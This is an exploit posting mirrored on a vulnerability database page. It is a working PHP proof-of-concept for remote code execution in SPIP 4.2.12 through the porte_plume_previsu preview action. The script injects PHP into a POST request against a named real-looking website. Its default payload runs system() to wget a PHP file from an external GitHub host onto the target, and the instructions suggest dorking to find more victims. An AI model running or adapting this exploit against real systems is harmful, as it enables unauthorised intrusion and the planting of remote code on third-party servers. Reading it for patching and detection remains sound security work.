Lucene search
K

SPIP 4.2.12 Code Execution

🗓️ 06 Sep 2024 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 339 Views

SPIP 4.2.12 PHP Code execution vulnerability on Windows 10 with Mozilla Firefox 129.0.1 (64 bits

Code
`=============================================================================================================================================  
| # Title : SPIP 4.2.12 PHP Code execution Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.spip.net/fr_rubrique91.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] Line 31 : Set your target.  
  
[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php  
  
[+] Payload :  
  
<?php  
  
<?php  
  
class indoushka {  
private $targetUrl;  
private $payload;  
  
public function __construct($targetUrl, $payload) {  
$this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';  
$this->payload = $this->generatePayload($payload);  
}  
  
private function generatePayload($payload) {  
return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";  
}  
public function exploit() {  
$data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);  
  
$ch = curl_init($this->targetUrl);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
echo "Exploit Sent! Response:\n";  
echo $response;  
}  
}  
  
$targetUrl = 'https://www.speleo-mandeure.fr/'; // استبدل هذا بالعنوان الحقيقي  
$payload = 'system("wget https://raw.githubusercontent.com/indoushka/Mari/master/install.php");'; // أوامر PHP التي تريد تنفيذها  
$exploit = new indoushka($targetUrl, $payload);  
$exploit->exploit();  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation